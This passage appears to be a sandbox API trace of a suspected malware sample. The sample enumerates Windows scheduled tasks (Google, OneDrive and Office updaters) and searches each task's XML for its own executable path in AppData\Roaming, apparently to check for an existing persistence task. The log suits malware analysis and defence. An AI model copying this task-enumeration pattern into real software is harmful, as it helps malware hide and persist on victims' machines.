x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.620] IUnknown:Release (This=0x126bc0) returned 0x0 [0138.620] IRegisteredTaskCollection:get_Item (in: This=0x126b00, index=0x24df60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000005, varVal2=0x449cf8), ppRegisteredTask=0x24df10 | out: ppRegisteredTask=0x24df10*=0x126bc0) returned 0x0 [0138.620] IRegisteredTask:get_Name (in: This=0x126bc0, pName=0x24df30 | out: pName=0x24df30*="OneDrive Standalone Update Task-S-1-5-21-2345716840-1148442690-1481144037-1000") returned 0x0 [0138.620] IRegisteredTask:get_Xml (in: This=0x126bc0, pXml=0x24df18 | out: pXml=0x24df18*="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n") returned 0x0 [0138.626] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n \r\n \r\n \r\n 1992-05-01T04:00:00\r\n true\r\n \r\n P1D\r\n false\r\n \r\n P1D\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n true\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n P1D\r\n 7\r\n \r\n \r\n \r\n %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe\r\n \r\n \r\n \r\n \r\n \r\n YKYD69Q\\aETAdzjz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.626] IUnknown:Release (This=0x126bc0) returned 0x0 [0138.626] IUnknown:Release (This=0x126b00) returned 0x0 [0138.626] ITaskFolder:GetFolders (in: This=0x125a50, flags=0, ppFolders=0x24df28 | out: ppFolders=0x24df28*=0x126b00) returned 0x0 [0138.629] ITaskFolderCollection:get_Count (in: This=0x126b00, pCount=0x24e098 | out: pCount=0x24e098*=3) returned 0x0 [0138.629] ITaskFolderCollection:get_Item (in: This=0x126b00, index=0x24df60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0x449cf8), ppFolder=0x24df10 | out: ppFolder=0x24df10*=0x126bd0) returned 0x0 [0138.629] ITaskFolder:GetTasks (in: This=0x126bd0, flags=1, ppTasks=0x24dd90 | out: ppTasks=0x24dd90*=0x126c40) returned 0x0 [0138.630] IRegisteredTaskCollection:get_Count (in: This=0x126c40, pCount=0x24def0 | out: pCount=0x24def0*=0) returned 0x0 [0138.630] IUnknown:Release (This=0x126c40) returned 0x0 [0138.630] ITaskFolder:GetFolders (in: This=0x126bd0, flags=0, ppFolders=0x24dd98 | out: ppFolders=0x24dd98*=0x126c40) returned 0x0 [0138.634] ITaskFolderCollection:get_Count (in: This=0x126c40, pCount=0x24df08 | out: pCount=0x24df08*=3) returned 0x0 [0138.634] ITaskFolderCollection:get_Item (in: This=0x126c40, index=0x24ddd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x24dd80 | out: ppFolder=0x24dd80*=0x126d80) returned 0x0 [0138.634] ITaskFolder:GetTasks (in: This=0x126d80, flags=1, ppTasks=0x24dc00 | out: ppTasks=0x24dc00*=0x126e00) returned 0x0 [0138.640] IRegisteredTaskCollection:get_Count (in: This=0x126e00, pCount=0x24dd60 | out: pCount=0x24dd60*=6) returned 0x0 [0138.640] IRegisteredTaskCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126f40) returned 0x0 [0138.640] IRegisteredTask:get_Name (in: This=0x126f40, pName=0x24dc10 | out: pName=0x24dc10*="Office Automatic Updates") returned 0x0 [0138.640] IRegisteredTask:get_Xml (in: This=0x126f40, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n") returned 0x0 [0138.680] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n true\r\n PT4H\r\n \r\n \r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n PT30M\r\n PT1H\r\n false\r\n \r\n P3D\r\n true\r\n PT15M\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n P3D\r\n 7\r\n \r\n PT30M\r\n 3\r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.681] IUnknown:Release (This=0x126f40) returned 0x0 [0138.681] IRegisteredTaskCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126f40) returned 0x0 [0138.681] IRegisteredTask:get_Name (in: This=0x126f40, pName=0x24dc10 | out: pName=0x24dc10*="Office ClickToRun Service Monitor") returned 0x0 [0138.681] IRegisteredTask:get_Xml (in: This=0x126f40, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n") returned 0x0 [0138.684] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n true\r\n PT6H\r\n \r\n P1D\r\n false\r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT30M\r\n 7\r\n true\r\n false\r\n \r\n false\r\n false\r\n \r\n IgnoreNew\r\n false\r\n false\r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.684] IUnknown:Release (This=0x126f40) returned 0x0 [0138.684] IRegisteredTaskCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126f40) returned 0x0 [0138.684] IRegisteredTask:get_Name (in: This=0x126f40, pName=0x24dc10 | out: pName=0x24dc10*="OfficeBackgroundTaskHandlerLogon") returned 0x0 [0138.684] IRegisteredTask:get_Xml (in: This=0x126f40, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0138.686] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n PT10M\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.687] IUnknown:Release (This=0x126f40) returned 0x0 [0138.687] IRegisteredTaskCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126f40) returned 0x0 [0138.687] IRegisteredTask:get_Name (in: This=0x126f40, pName=0x24dc10 | out: pName=0x24dc10*="OfficeBackgroundTaskHandlerRegistration") returned 0x0 [0138.687] IRegisteredTask:get_Xml (in: This=0x126f40, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n") returned 0x0 [0138.689] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Background Task Handler, which updates relevant Office data.\r\n \r\n \r\n \r\n true\r\n \r\n PT1H\r\n false\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\officebackgroundtaskhandler.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.689] IUnknown:Release (This=0x126f40) returned 0x0 [0138.689] IRegisteredTaskCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126f40) returned 0x0 [0138.690] IRegisteredTask:get_Name (in: This=0x126f40, pName=0x24dc10 | out: pName=0x24dc10*="OfficeTelemetryAgentFallBack2016") returned 0x0 [0138.690] IRegisteredTask:get_Xml (in: This=0x126f40, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n") returned 0x0 [0138.692] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \r\n \r\n \r\n \r\n PT12H\r\n false\r\n \r\n true\r\n PT30M\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.692] IUnknown:Release (This=0x126f40) returned 0x0 [0138.692] IRegisteredTaskCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126f40) returned 0x0 [0138.692] IRegisteredTask:get_Name (in: This=0x126f40, pName=0x24dc10 | out: pName=0x24dc10*="OfficeTelemetryAgentLogOn2016") returned 0x0 [0138.692] IRegisteredTask:get_Xml (in: This=0x126f40, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n") returned 0x0 [0138.695] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \r\n \r\n \r\n \r\n PT8H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n LeastPrivilege\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.695] IUnknown:Release (This=0x126f40) returned 0x0 [0138.695] IUnknown:Release (This=0x126e00) returned 0x0 [0138.695] ITaskFolder:GetFolders (in: This=0x126d80, flags=0, ppFolders=0x24dc08 | out: ppFolders=0x24dc08*=0x126e00) returned 0x0 [0138.696] ITaskFolderCollection:get_Count (in: This=0x126e00, pCount=0x24dd78 | out: pCount=0x24dd78*=0) returned 0x0 [0138.696] IUnknown:Release (This=0x126e00) returned 0x0 [0138.696] TaskScheduler:IUnknown:Release (This=0x126d80) returned 0x0 [0138.696] ITaskFolderCollection:get_Item (in: This=0x126c40, index=0x24ddd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x24dd80 | out: ppFolder=0x24dd80*=0x126d80) returned 0x0 [0138.696] ITaskFolder:GetTasks (in: This=0x126d80, flags=1, ppTasks=0x24dc00 | out: ppTasks=0x24dc00*=0x126e00) returned 0x0 [0138.697] IRegisteredTaskCollection:get_Count (in: This=0x126e00, pCount=0x24dd60 | out: pCount=0x24dd60*=0) returned 0x0 [0138.697] IUnknown:Release (This=0x126e00) returned 0x0 [0138.697] ITaskFolder:GetFolders (in: This=0x126d80, flags=0, ppFolders=0x24dc08 | out: ppFolders=0x24dc08*=0x126e00) returned 0x0 [0138.743] ITaskFolderCollection:get_Count (in: This=0x126e00, pCount=0x24dd78 | out: pCount=0x24dd78*=45) returned 0x0 [0138.743] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.743] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x127040) returned 0x0 [0138.746] IRegisteredTaskCollection:get_Count (in: This=0x127040, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.746] IRegisteredTaskCollection:get_Item (in: This=0x127040, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5e0) returned 0x0 [0138.746] IRegisteredTask:get_Name (in: 